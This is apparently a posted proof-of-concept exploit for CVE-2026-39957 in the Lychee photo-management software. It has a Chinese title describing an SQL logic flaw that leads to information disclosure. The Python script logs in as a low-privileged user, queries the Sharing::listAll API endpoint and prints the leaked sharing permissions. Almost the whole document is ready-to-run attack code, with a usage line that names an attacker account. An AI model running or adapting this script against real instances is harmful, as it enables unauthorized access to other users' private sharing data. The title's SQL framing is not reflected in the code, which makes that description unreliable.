CVE-2026-39957 Lychee SQL逻辑漏洞导致信息泄露

# Proof of Concept for CVE-2026-39957 # Exploitation requires a non-admin user with upload permission. import requests def exploit(target, username, password): session = requests.Session() # Step 1: Authenticate as low-privileged user login_url = f"{target}/api/Session::login" creds = {"username": username, "password": password} login_resp = session.post(login_url, json=creds) if login_resp.status_code != 200: print("Login failed") return # Step 2: Access the vulnerable endpoint # The vulnerability is in the backend logic, no special payload needed. vuln_url = f"{target}/api/Sharing::listAll" response = session.get(vuln_url) if response.status_code == 200: data = response.json() print("[+] Successfully exploited! Leaked Sharing Permissions:") print(data) else: print("Exploit failed") # Usage # exploit("http://lychee-instance.com", "attacker", "password")